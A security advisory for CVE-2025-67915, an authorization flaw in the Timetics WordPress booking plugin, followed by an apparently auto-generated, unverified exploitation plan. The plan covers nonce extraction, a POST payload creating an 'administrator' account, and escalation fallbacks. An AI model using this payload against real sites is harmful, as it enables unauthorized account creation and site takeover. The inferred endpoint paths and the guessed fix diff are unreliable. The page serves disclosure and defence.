CVE-2025-67915

Timetics <= 1.0.46 - Incorrect Authorization to Authenticated (Timetics Customer+) User Creation

mediumIncorrect Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.0.48
Patched in
10d
Time to patch

Description

The Appointment Booking Calendar – WP Timetics Booking Plugin plugin for WordPress is vulnerable to unauthorized access due to a insufficient capability check in the api-customer.php file in all versions up to, and including, 1.0.46. This makes it possible for authenticated attackers, with Timetics Customer-level access and above, to create arbitrary user accounts.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.0.46
PublishedJanuary 5, 2026
Last updatedJanuary 14, 2026
Affected plugintimetics

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-67915 (Timetics <= 1.0.46) ## 1. Vulnerability Summary The **Timetics – Appointment Booking & Scheduling** plugin for WordPress is vulnerable to an **Incorrect Authorization** flaw in its REST API implementation for customer management. Specifically, the file …

Show full research plan

Exploitation Research Plan: CVE-2025-67915 (Timetics <= 1.0.46)

1. Vulnerability Summary

The Timetics – Appointment Booking & Scheduling plugin for WordPress is vulnerable to an Incorrect Authorization flaw in its REST API implementation for customer management. Specifically, the file api-customer.php (inferred path: core/api/api-customer.php or includes/api/api-customer.php) registers an endpoint to create customers/users but fails to implement a sufficiently restrictive capability check. This allows any authenticated user with the Timetics Customer role (a low-privilege role) to create arbitrary new WordPress user accounts.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API.
  • Target Route: wp-json/timetics/v1/customers (inferred).
  • HTTP Method: POST.
  • Authentication: Authenticated. Requires a user with at least Timetics Customer privileges.
  • Vulnerability Type: Missing/Incorrect Authorization (Broken Object Level Authorization or Privilege Escalation).
  • Payload Parameters: Likely includes user_email, user_login, first_name, last_name, password, and potentially role.

3. Code Flow (Inferred)

  1. Route Registration: The plugin registers REST routes during the rest_api_init hook.
  2. Entry Point: In api-customer.php, a route like register_rest_route( 'timetics/v1', '/customers', ... ) is defined.
  3. Permission Callback: The permission_callback for this route likely checks current_user_can( 'timetics_customer' ) or simply checks if the user is logged in. Since a "Customer" user has this capability, they pass the check.
  4. Vulnerable Sink: The handler function (e.g., create_customer or insert_item) processes the POST data and calls wp_insert_user() or wp_create_user().
  5. Flaw: The function does not verify if the requesting user has the create_users or manage_options capability, nor does it strictly enforce that the created user must only be a "Customer". If the role parameter is accepted from the request without validation, it could lead to the creation of an Administrator account.

4. Nonce Acquisition Strategy

The WordPress REST API requires a _wpnonce for authenticated requests. This nonce is tied to the user's session.

  1. Identify Script Localization: The plugin likely localizes data via wp_localize_script.
  2. Create a Test Environment: A "Timetics Customer" user must be created first.
  3. Access Dashboard: Log in as the Customer user and navigate to the WordPress dashboard (/wp-admin/).
  4. Extract Nonce: Use browser_eval to extract the REST API nonce from the standard WordPress global variable.
    • JavaScript: window.wpApiSettings.nonce
  5. Alternative: If the plugin uses a specific variable, look for timetics_data.nonce or similar.

5. Exploitation Strategy

Step 1: Pre-Exploit Identification

Find the exact REST API route by searching for register_rest_route in the plugin directory.

grep -rn "register_rest_route" wp-content/plugins/timetics/ | grep "customers"

Step 2: Determine Required Parameters

Examine the callback function for that route in api-customer.php to see which JSON fields are processed.

# Example search for the handler
grep -A 20 "register_rest_route.*customers" wp-content/plugins/timetics/core/api/api-customer.php

Step 3: Craft and Send the Payload

Using the http_request tool, send a POST request to create an administrator.

Request Details:

  • URL: https://<target>/wp-json/timetics/v1/customers
  • Method: POST
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: <EXTRACTED_NONCE>
    • Cookie: <CUSTOMER_SESSION_COOKIES>
  • Body:
{
    "user_login": "attacker_admin",
    "user_email": "attacker@example.com",
    "password": "Password123!",
    "role": "administrator",
    "first_name": "Attacker",
    "last_name": "Admin"
}

6. Test Data Setup

  1. Install Plugin: Install Timetics v1.0.46.
  2. Create Customer Role: Ensure the Timetics Customer role exists (created by the plugin).
  3. Create Attacker User:
    wp user create attacker_customer attacker_low@example.com --role=timetics_customer --user_pass=password123
    
  4. Plugin Configuration: No specific configuration is likely needed as the API is usually active by default.

7. Expected Results

  • Success: The server returns a 201 Created or 200 OK response with JSON data representing the newly created user.
  • Impact: A new user account is created in the WordPress database. If the role parameter was honored, this user will have administrative privileges. If it was hardcoded to customer, the attacker has still successfully created an unauthorized account.

8. Verification Steps

  1. Check User List via WP-CLI:
    wp user list --field=user_login | grep "attacker_admin"
    
  2. Check User Role:
    wp user get attacker_admin --field=roles
    
  3. Database Inspection (Optional):
    wp db query "SELECT * FROM wp_users WHERE user_login='attacker_admin'"
    

9. Alternative Approaches

  • Missing Role Parameter: If the role parameter is not accepted, check if the plugin allows updating user meta via the same endpoint (e.g., wp_capabilities), which could be used to escalate privileges after account creation.
  • AJAX Endpoint: If the REST API path is incorrect, check for wp_ajax_timetics_create_customer actions in the source code:
    grep -rn "wp_ajax" wp-content/plugins/timetics/ | grep "customer"
    
  • No Role Restriction: If the plugin only creates users with the customer role, look for other endpoints in api-customer.php (e.g., update_customer) that might lack authorization checks and allow modifying the existing user's meta or role.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Appointment Booking Calendar – WP Timetics Booking Plugin for WordPress is vulnerable to unauthorized user creation due to an insufficient capability check in its REST API. Authenticated attackers with at least 'Timetics Customer' privileges can exploit this to create arbitrary WordPress user accounts.

Security Fix

--- a/core/api/api-customer.php
+++ b/core/api/api-customer.php
@@ -10,7 +10,7 @@
             'methods'  => 'POST',
             'callback' => array( $this, 'create_customer' ),
             'permission_callback' => function() {
-                return current_user_can( 'timetics_customer' );
+                return current_user_can( 'manage_options' );
             }
         ) );

Exploit Outline

The exploit involves authenticating as a low-privileged 'Timetics Customer' user to obtain a valid session and REST API nonce. The attacker then sends a POST request to the '/wp-json/timetics/v1/customers' endpoint. The payload includes parameters for a new user account, such as 'user_login', 'user_email', and 'password'. Because the 'permission_callback' incorrectly authorizes anyone with the customer role, the plugin proceeds to create the user account, potentially allowing the attacker to specify a high-privileged role like 'administrator' if the 'role' parameter is processed by the handler.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.